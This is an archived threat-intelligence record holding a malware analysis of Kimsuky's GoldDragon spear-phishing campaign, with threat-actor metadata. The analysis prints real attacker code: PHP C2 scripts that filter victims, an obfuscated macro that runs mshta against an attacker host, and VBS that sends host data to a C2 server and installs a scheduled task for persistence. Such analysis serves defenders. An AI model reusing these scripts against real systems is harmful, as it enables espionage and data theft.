{
	"id": "b9c032b3-e010-4fdd-a5c8-4718b09550bc",
	"created_at": "2026-04-06T00:10:58.992814Z",
	"updated_at": "2026-04-10T03:37:41.021225Z",
	"deleted_at": null,
	"sha1_hash": "263cf9bd0bc4d8e05d22905bbe47df79eebca485",
	"title": "Kimsuky’s GoldDragon cluster and its C2 operations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1554022,
	"plain_text": "Kimsuky’s GoldDragon cluster and its C2 operations\r\nBy Seongsu Park\r\nPublished: 2022-08-25 · Archived: 2026-04-05 15:39:15 UTC\r\nKimsuky (also known as Thallium, Black Banshee and Velvet Chollima) is a prolific and active threat actor\r\nprimarily targeting Korea-related entities. Like other sophisticated adversaries, this group also updates its tools\r\nvery quickly. In early 2022, we observed this group was attacking the media and a think-tank in South Korea and\r\nreported technical details to our threat intelligence customer.\r\nKimsuky’s GoldDragon cluster infection procedure\r\nIn its new attack, the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document. Various examples of different Word documents were uncovered, each showing\r\ndifferent decoy contents related to geopolitical issues on the Korean Peninsula.\r\nContents of decoy\r\nThe actor took advantage of the HTML Application file format to infect the victim and occasionally used the\r\nHangeul decoy document. After the initial infection, a Visual Basic Script was delivered to the victim. In this\r\nprocess, the actor abused a legitimate blog service to host a malicious script with an encoded format. The\r\nimplanted VBS file is capable of reporting information about infected machines and downloading additional\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 1 of 13\n\npayloads with an encoded format. 
The final stage is a Windows executable-type malware that is capable of\r\nstealing information from the victim such as file lists, user keystrokes, and stored web browser login credentials.\r\nWhile researching Kimsuky’s novel infection chain, grouped as a GoldDragon cluster, we are faced with several\r\nlimitations:\r\nIt’s not easy to acquire the next stage payloads during analysis of a multi-stage infection.\r\nEven if we connect to the C2 server to acquire the payload, it’s hard to get a relevant response.\r\nIt’s not easy to figure out the connection between each object.\r\nWhile tracking the Kimsuky group’s endless operations, however, we discovered server-side scripts related to the\r\nabove infection chain. Based on this finding and further enriching it with data from our telemetry, we were able to\r\nreconstruct the whole operation methodology of this group. The Kimsuky group configured multi-stage command\r\nand control servers with various commercial hosting services located around the world. We can summarize the\r\nwhole C2 operation as follows:\r\n1. The actor sends a spear-phishing email to the potential victim to download additional documents.\r\n2. If the victim clicks the link, it results in a connection to the first stage C2 server, with an email address as\r\nparameter.\r\n3. The first stage C2 server verifies the incoming email address parameter is an expected one and delivers\r\nthe malicious document if it’s in the target list. The first stage script also forwards the victim’s IP address to\r\nthe next stage server.\r\n4. When the fetched document is opened, it connects to the second C2 server.\r\n5. The corresponding script on the second C2 server checks the IP address forwarded from the first stage\r\nserver to check it’s an expected request from the same victim. Using this IP validation scheme, the actor\r\nverifies whether the incoming request is from the victim or not.\r\n6. On top of that, the operator relies on several other processes to carefully deliver the next payload such as\r\nchecking OS type and predefined user-agent strings.\r\nC2 server structure\r\nC2 script (download.php) for malicious document delivery\r\nAs a result of analyzing the server-side script to convey a malicious document, we figured out how this actor\r\nverifies the request from the client and minimizes exposure of their payload. This script works with a specific\r\nparameter name from the victim, so we suspect the actor delivers a download link to the victim via email or by\r\nsending a request using another type of payload.\r\n1. It checks the who GET parameter from the victim. The who parameter contains an email address without\r\na domain name.\r\nif (isset($_GET['who']) \u0026\u0026 $_GET['who'] == \"[redacted]\") # Check 'who' parameter value\r\n        {\r\n            $vbs_server = \"weworld59.myartsonline.com\"; # The next stage server\r\n            $virus = \"v.doc\";                       # Malicious document\r\n            $unvirus = \"un.doc\";                     # Benign document\r\n            $downname = \"CV.DHOM Alexandra Siddall (Korean).doc\"; # Delivered file name\r\n            $who = $_GET['who'];\r\n            $down = $who . \".txt\";\r\n2. If the incoming request contains an expected email address, it saves the date, IP address and user-agent to\r\nthe [who]_downhistory.txt file.\r\n3. If the user-agent contains Windows, which means the victim is a Windows machine, it goes to the next\r\nstep. Otherwise, it delivers a benign document to the victim.\r\n4. Next, the script checks whether the connection from the victim is the first request or not by checking the\r\nexistence of the [who].txt file.\r\n5. If the [who].txt file does not exist, it means it’s the first request from the victim, so the script forwards the\r\nIP address to the other server (VBS server), delivering the malicious document, saving the victim’s\r\ninformation to the [who].txt including date, IP address and user-agent.\r\nNote that the script sends the victim’s IP address to the other server (named “VBS server” by the author). If the\r\nvictim connects with an appropriate email address and if it’s an initial connection, the C2 script forwards the IP\r\naddress to the specific servers with an /index.php?ip= GET request. Sending the appropriate victim IP addresses to\r\nthe remote server is a very important process for the operational security of this actor. We’ll look in more detail at\r\nhow the operator uses this information in the next section.\r\nfunction send_ip($host , $data)\r\n{\r\n$fp = @fsockopen(\"tcp://\".$host, 80, $errno, $errstr, 30);\r\nif (!$fp) {\r\n} else {\r\n     $out = \"GET /index.php?ip=\".$data.\" HTTP/1.1\\r\\n\";\r\n     $out .= \"Host: \".$host.\"\\r\\n\";\r\n     $out .= \"Connection: Close\\r\\n\\r\\n\";\r\n     fwrite($fp, $out);\r\n     fclose($fp);\r\n}\r\n}\r\nLooking at the corresponding script (index.php) of the above IP-delivering GET request, here’s how it works.\r\nOnce this script receives an IP address in the ip parameter of the HTTP request, it extracts the victim’s IP address\r\nfrom the ip parameter and saves it to the allow.txt file. Otherwise, it saves the client information to the error.txt file\r\nand redirects the client to mail.google.com in this case. Additionally, the author used various legitimate websites\r\nfor redirection, such as naver.com, kisa.or.kr, or other popular email services. The allow.txt file, which contains the\r\nappropriate victim’s IP address, is referred to by another C2 script to verify whether the incoming request is valid\r\nand thus whether or not to deliver the next stage payload.\r\nif(isset($_GET['ip'])){\r\n     $szfilename = \"allow.txt\";\r\n     $pfile = fopen($szfilename,\"ab\");\r\n     $res= $_GET['ip'] . \"\\r\\n\" ;\r\n     fwrite($pfile,$res);\r\n     fclose($pfile);  \r\n     exit;\r\n}\r\n$szfilename = \"error.txt\";\r\n$pfile = fopen($szfilename,\"ab\");\r\n$res= $date . \"-\" . \"\\r\\n\".$ip . \"\\r\\n\" . $_SERVER['HTTP_USER_AGENT'].\"\\r\\n\";\r\nfwrite($pfile,$res);\r\nfclose($pfile);  \r\nheader('Location: https://mail.google.com');\r\nAlso, we discovered that both malicious and benign documents are being delivered by this script. The operator\r\nmaintains a pair of documents, one benign (un.doc) and the other malicious (v.doc), and delivers the appropriate\r\none depending on the result of the victim verification step. The contents of decoy documents have various topics\r\nincluding the agenda of the “2022 Asian Leadership Conference”, a form of honorarium request and an Australian\r\ndiplomat’s curriculum vitae. As we can see, the actor uses content the victim could be interested in, such as an\r\nevent to be held in the near future, a specific request form, and the resume of a high-profile individual.\r\nDecoy documents\r\nMalicious document and method of delivering next stage payload\r\nMalicious documents delivered to the victim contain a macro to fetch the next stage payload. The macro has a\r\nsimple functionality and, interestingly, it spawns several child Windows command shells, probably intended for\r\nevading behavior-based analysis. Eventually, the macro executes a fetched payload with the mshta.exe process that\r\nis designed to execute a Microsoft HTML Application. The following scriptlet is part of a malicious macro in the\r\ndocument. It contains a remote server address to fetch the next stage payload.\r\ncmd = \"c\" + \"md /\" + \"c c\" + \"md /\" + \"c cm\" + \"d /\" + \"c c\" + \"m\" + \"d /\" + \"c c\" + \"md /\" + \"c c\" + \"md /\" + \"c msht\" + \"a.e\" + \"xe hxxp://leehr24.mywebcommunity[.]org/h.php\"\r\nShell cmd, 0\r\nSleep 9000\r\ncmd = \"cm\" + \"d /\" + \"c TAS\" + \"KKI\" + \"LL /\" + \"F /\" + \"IM msh\" + \"ta.e\" + \"xe\"\r\nShell cmd, 0\r\nLuckily, we discovered the corresponding C2 script (h.php) from our telemetry. This script saves incoming traffic\r\ninformation to the log.txt file including the date, IP address, user-agent and the right-most 20 characters of the IP\r\nMD5 hash which is internally called “TID” (probably short for “Target ID”). Next, it checks the presence of the\r\nallow.txt file that contains IP addresses of verified victims. Only if the client’s IP address exists in the allow.txt is\r\nthe next stage payload, h.txt, delivered. Otherwise, the script delivers a short Visual Basic Script for terminating\r\nthe mshta.exe process.\r\n$downfile = \"h.txt\";\r\n$logfile = \"log.txt\";\r\n$allow_file = \"allow.txt\";\r\n$handle = fopen($logfile, \"ab\");\r\nfwrite($handle, $date .\"\\r\\n\" . $ip . \"\\r\\n\" . $_SERVER['HTTP_USER_AGENT'].\"\\r\\n\".\"id=\".$TID.\"---------\\r\\n\");\r\nfclose($handle);\r\nif(file_exists($allow_file)){\r\n    $fp = fopen($allow_file,\"r\");\r\n    $content = fread($fp, filesize($allow_file));\r\n    fclose($fp);\r\n    if(!stristr($content,$ip )){\r\n   echo 'Set objShell = CreateObject(\"Wscript.shell\")\r\n     objShell.run \"TASKKILL /F /IM mshta.exe\" , 0 , False';\r\n   exit;\r\n    }\r\n}\r\nVBS scripts from VBS Server\r\nAllowing the macro in the malicious Word document to run leads the victim to fetch and execute an HTML\r\nApplication (.HTA) payload. The fetched HTA file has two main goals: reporting the victim information to the C2\r\nserver and creating a scheduled task for auto-execution. The Kimsuky group tends to heavily reuse their code in\r\nvarious scripts; for instance, Visual Basic applications in macros, Visual Basic scripts and HTML applications.\r\nThe sent data contains the ProgramFiles folder path, antivirus name, recently opened file list, user name, OS\r\nname, OS version, Microsoft office version, .NET framework version, the file list from the Desktop folder, and a\r\nlist of user-pinned taskbar items. When the script delivers the collected information to the C2 server, it uses\r\nthe /info.php?ki87ujhy= format, the Kimsuky group’s usual URL format for fingerprinting. Notably, it uses a hard-coded user-agent, including the intentionally misspelled word Chnome. After looking at the server-side script, we\r\nunderstand why they use Chnome and not Chrome.\r\nProgramFilesFolder = objShell.ExpandEnvironmentStrings(\"%ProgramFiles%\")\r\nProgramFilesx86Folder = objShell.ExpandEnvironmentStrings(\"%ProgramFiles(x86)%\")\r\ndrl = server_url + \"/info.php?ki87ujhy=\" + ProgramFilesx86Folder + \"\u0026rdxvdw=\" + ProgramFilesFolder\r\n..[redacted]..\r\nPost = \"v=\" + AntiVirusName + \"\u0026r=\" + recentlist + \"\u0026un=\" + UserName + \"\u0026os=\" + os + \"\u0026sv=\" + Version + \"\u0026msv=\" + GetOfficeVersionNumber + \"\u0026dnv=\" + dnv + \"\u0026dll=\" + desktop_lnk + \"\u0026tll=\" + taskbar_lnk\r\nDim WinHttpReq\r\nSet WinHttpReq = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")\r\nWinHttpReq.Open \"POST\", drl, False\r\nWinHttpReq.setRequestHeader \"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36\"\r\nWinHttpReq.setRequestHeader \"Content-Type\", \"application/x-www-form-urlencoded\"\r\nWinHttpReq.setRequestHeader \"Content-Length\", Len(Post)\r\nWinHttpReq.Send Post\r\nApart from the reporting capability, the fetched script downloads an additional payload and registers it with a\r\npersistence mechanism. This code is also heavily used in other Kimsuky scripts and fetches the payload through\r\ns.php, saving it to the defs.ini file, registering the file as a Windows schedule, with the name “OneDrive Clean” in\r\nthis case.\r\nSet shell_obj = CreateObject(\"WScript.Shell\")\r\nini_file = shell_obj.expandenvironmentstrings(\"%appdata%\") \u0026 \"\\defs.ini\"\r\ndrl = server_url + \"/s.php\"\r\nSet WinHttpReq= CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")\r\nWinHttpReq.Open \"GET\", drl,False\r\nWinHttpReq.setRequestHeader \"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36\"\r\nWinHttpReq.send\r\nIf WinHttpReq.Status=200 Then\r\nSet oFile = CreateObject(\"Scripting.FileSystemObject\")\r\nSet ofp = oFile.CreateTextFile(ini_file, 2)\r\nofp.Write kjhskfjaskdjf(res)\r\nofp.Close\r\nEnd If\r\ncmd1 = \"w\" + \"sc\" + \"ript.e\" + \"xe //\" + \"e:v\" + \"bsc\" + \"ript //b \"\"\"\"\" + ini_file + \"\"\"\"\"\"\r\ncmd2 = \"scht\" + \"asks /cr\" + \"eate /s\" + \"c mi\" + \"nute /mo 30 /tn \"\"OneDrive Clean\"\" /tr \"\"\" + cmd1 + \"\"\"\"\r\nshell_obj.run cmd2 ,0,False\r\nDuring our research, we discovered a corresponding C2 script (s.php) for delivering a payload for auto-execution.\r\nThe primary objectives of the delivered VBS payload are connecting to the legitimate blog, parsing the post and\r\nfinally acquiring the next stage payload. Interestingly, this C2 script generates a blog address based on the victim’s\r\nIP address. After calculating the MD5 hash of the victim’s IP address, it cuts off the last 20 characters, and turns it\r\ninto a blog address. The author’s intent here is to operate a dedicated fake blog for each victim, thereby decreasing\r\nexposure of their malware and infrastructure. Additionally, the script checks whether the user-agent has an\r\nuncommon string, chnome. As we mentioned earlier, the Visual Basic Script connects to this C2 script using a\r\nhard-coded chnome User-agent name and the script checks the misspelled user-agent to verify it’s an expected\r\nrequest from a real victim.\r\n$filename = hash(\"md5\" , $ip);\r\n$filename = str_replace(\"+\" , \"\" , $filename);\r\n$filename = str_replace(\"=\" , \"\" , $filename);\r\n$filename = str_replace(\"/\" , \"\" , $filename);\r\n$filename = right($filename , 20);\r\n$logfile = $filename.\".txt\";\r\n$errorfile = \"error.txt\";\r\nif(stristr($_SERVER['HTTP_USER_AGENT'] , \"chnome\"))\r\n{\r\n   $url = base64_encode(\"https://\" . $filename . \".blogspot.com/2022/04/1.html\");\r\n   $spy_script = 'Function hhgtttgffgg(ByVal base64String)\r\n   On Error Resume Next\r\n   Const Base64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n   Dim dataLength, sOut, groupBegin\r\nBased on our findings and analysis above, we list the tricks the actor adopts to hide their infrastructure and make it\r\nharder for security researchers and auto-analysis systems to acquire payloads:\r\nTricks from C2 scripts\r\nVictims\r\nBased on the contents of the decoy document, we hypothesize that the targets of this operation are people or\r\nentities related to politics or diplomatic activities. Also, historically, politicians, diplomats, journalists, professors,\r\nand North Korean defectors have been prime targets of the Kimsuky group. Based on the email address names\r\nfrom the C2 scripts, we can further consolidate this hypothesis. The C2 scripts have only partial email addresses,\r\nso we tried to extrapolate the full email address and real owner from within the diplomatic and academic spheres.\r\nEmail name | Suspected email | Delivered file name | Email owner\r\nyk**** | yk****@***.ac.kr | unknown | South Korean university professor\r\nlee**** | lee****@gmail.com | CV.DHOM Alexandra Siddall (Korean).doc | Director General of South Korean government organization\r\nchon**** | chon****@naver.com | CV.DHOM Alexandra Siddall (Korean).doc | Researcher at Defense Analyses\r\nwoo****** | Unknown | CV.DHOM Alexandra Siddall (Korean).doc | Think-tank researcher\r\nscc***** | scc*****@naver.com | CV.DHOM Alexandra Siddall (Korean).doc | Researcher of think-tank\r\nwon*** | won***@****.ac.kr | CV.DHOM Alexandra Siddall (Korean).doc | South Korean university professor\r\nthk***** | thk*****@naver.com | CV.DHOM Alexandra Siddall (Korean).doc | South Korean university professor\r\nkim***** | kim*****@gmail.com | CV.DHOM Alexandra Siddall (Korean).doc | South Korean university professor\r\nkim*** | Unknown | 2022년AL(220412).doc (Asian Leadership Conference) | Probably former Korean Ambassador to the United Nations\r\njh****** | jh******@****.ac.kr | [양식]사례비지급의뢰서.doc ([Template]Pay honorarium.doc) | Professor of South Korea university\r\njung****** | jung******@gmail.com | [양식]사례비지급의뢰서.doc | Representative of Research Council for North Korea\r\nsung********* | sung*********@gmail.com | [양식]사례비지급의뢰서.doc | Assistant professor at South Korean university\r\nConclusions\r\nKimsuky, one of the most prolific and active threat actors on the Korean Peninsula, operates several clusters and\r\nGoldDragon is one of the most frequently used. We’ve seen that the Kimsuky group continuously evolves its\r\nmalware infection schemes and adopts novel techniques to hinder analysis. The main difficulty in tracking this\r\ngroup is that it’s tough to acquire a full-infection chain. As we can see from this research, threat actors have\r\nrecently adopted victim verification methodology in their command and control servers. Despite the difficulty of\r\nobtaining server-side objects, if we analyze an attacker’s server and malware from the victim’s side, we can get a\r\nfull understanding of how the threat actors operate their infrastructure and what kind of techniques they employ.\r\nIndicators of Compromise\r\nMalicious documents\r\nCHM file\r\nVisual Basic Scripts\r\nHTML Applications\r\nWindows executable payload\r\nServer scripts\r\nDomains and IPs\r\nMalicious document hosting servers:\r\nC2 servers:\r\nBlog URL\r\nSource: https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/"
	],
	"report_names": [
		"107258"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434258,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/263cf9bd0bc4d8e05d22905bbe47df79eebca485.pdf",
		"text": "https://archive.orkl.eu/263cf9bd0bc4d8e05d22905bbe47df79eebca485.txt",
		"img": "https://archive.orkl.eu/263cf9bd0bc4d8e05d22905bbe47df79eebca485.jpg"
	}
}